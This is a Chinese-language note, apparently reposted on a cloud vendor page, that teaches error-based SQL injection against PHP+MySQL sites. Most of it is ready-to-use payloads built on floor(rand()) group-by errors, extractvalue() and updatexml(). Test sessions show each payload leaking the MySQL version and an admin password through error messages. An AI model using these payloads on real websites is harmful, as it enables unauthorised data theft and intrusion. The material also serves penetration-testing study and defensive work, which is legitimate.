放點原來的筆記,Mysql在執行語句的時候會拋出異常資訊資訊,而php+mysql架構的網站往往又將錯誤碼顯示在頁面上,這樣可以通過構造如下三種方法擷取特定資料。
實際測試環境:
?| 1234567 | mysql> show tables;+----------------+| Tables_in_test |+----------------+| admin || article |+----------------+ |
?
| 12345678 | mysql> describe admin;+-------+------------------+------+-----+---------+----------------+| Field | Type | Null | Key | Default | Extra |+-------+------------------+------+-----+---------+----------------+| id | int(10) unsigned | NO | PRI | NULL | auto_increment || user | varchar(50) | NO | | NULL | || pass | varchar(50) | NO | | NULL | |+-------+------------------+------+-----+---------+----------------+ |
?
| 12345678 | mysql> describe article;+---------+------------------+------+-----+---------+----------------+| Field | Type | Null | Key | Default | Extra |+---------+------------------+------+-----+---------+----------------+| id | int(10) unsigned | NO | PRI | NULL | auto_increment || title | varchar(50) | NO | | NULL | || content | varchar(50) | NO | | NULL | |+---------+------------------+------+-----+---------+----------------+ |
1、通過floor報錯
可以通過如下一些利用代碼
?| 12 | and select 1 from (select count(*),concat(version(),floor(rand(0)*2))xfrom information_schema.tables group by x)a); |
| 123 | and (select count(*) from (select 1 union select null union select !1)xgroup by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); |
舉例如下: 首先進行正常查詢:
?| 123456 | mysql> select * from article where id = 1;+----+-------+---------+| id | title | content |+----+-------+---------+| 1 | test | do it |+----+-------+---------+ |
假如id輸入存在注入的話,可以通過如下語句進行報錯。
?| 123 | mysql> select * from article where id = 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key' |
可以看到成功爆出了Mysql的版本,如果需要查詢其他資料,可以通過修改version()所在位置語句進行查詢。 例如我們需要查詢管理使用者名和密碼: Method1:
?| 1234 | mysql> select * from article where id = 1 and (select 1 from(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))xfrom information_schema.tables group by x)a);ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' |
Method2:
?| 1234 | mysql> select * from article where id = 1 and (select count(*)from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' |
2、ExtractValue 測試語句如下
?| 1 | and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); |
實際測試過程
?| 123 | mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--ERROR 1105 (HY000): XPATH syntax error: '\admin888' |
3、UpdateXml 測試語句
?| 1 | and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) |
實際測試過程
?| 123 | mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$' |
All, thanks foreign guys.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
